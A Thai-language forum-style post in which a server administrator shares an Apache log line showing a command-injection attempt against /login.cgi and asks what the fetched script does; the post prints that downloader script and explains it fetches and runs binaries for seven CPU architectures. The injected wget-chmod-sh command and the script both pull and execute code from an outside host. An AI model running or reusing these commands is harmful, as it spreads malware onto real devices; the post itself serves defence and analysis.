ฉันสังเกตเห็นเซิร์ฟเวอร์ของ apache บันทึกเมื่อไม่นานมานี้มีสายแปลก ๆ ดังต่อไปนี้:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
ดังนั้นฉันจึงสร้างตัวกรอง Fail2Ban ที่กำหนดเองและเริ่มแบนไอพีที่ร้องขอ URL /login.cgi เหล่านี้
แต่ฉันอยากรู้ว่าพวกเขาพยายามทำอะไรดังนั้นฉันจึงดึงสคริปต์ที่พวกเขาพยายามจะดำเนินการและฉันไม่สามารถเข้าใจได้ว่ามันทำอะไร มีบางอย่างเกี่ยวกับการลบโฟลเดอร์ arch ใน / var และ / tmp ใช่ไหม
อย่างไรก็ตามนี่คือ:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
hxxp://80.211.173.159:80/$name
ที่ไหน $name
เป็นสถาปัตยกรรมซีพียูแต่ละตัวใน bin_names
. ดังนั้นสคริปต์โจมตี 7 รายการจะถูกดาวน์โหลดและดำเนินการ